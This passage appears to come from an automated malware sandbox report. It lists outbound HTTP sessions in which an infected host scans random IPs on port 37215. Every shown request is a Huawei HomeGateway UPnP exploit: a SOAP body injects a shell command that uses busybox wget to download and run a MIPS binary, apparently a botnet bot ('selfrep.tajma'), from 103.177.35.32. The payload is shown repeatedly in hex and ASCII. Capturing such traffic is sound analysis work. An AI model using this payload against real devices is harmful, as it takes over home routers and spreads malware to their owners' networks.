                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        97192.168.2.2340688197.46.180.5137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279428005 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        98192.168.2.235806694.217.166.24137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279445887 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        99192.168.2.2335038157.235.64.18637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279457092 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        100192.168.2.2336232197.171.96.20837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.279476881 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        101192.168.2.2349834157.183.238.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292524099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        102192.168.2.2349858197.180.218.2737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292593956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        103192.168.2.2353054197.240.121.17337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292593956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        104192.168.2.234517627.172.132.24037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292617083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        105192.168.2.235893241.243.21.24037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292623043 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        106192.168.2.2339872197.43.34.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.292637110 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
